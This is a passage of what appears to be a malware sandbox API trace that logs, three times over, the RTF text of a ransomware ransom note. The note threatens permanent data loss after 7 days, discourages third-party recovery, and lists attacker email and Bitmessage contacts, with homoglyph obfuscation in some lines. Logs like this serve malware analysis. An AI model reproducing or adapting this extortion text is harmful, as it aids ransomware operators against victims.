Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.165] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.165] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 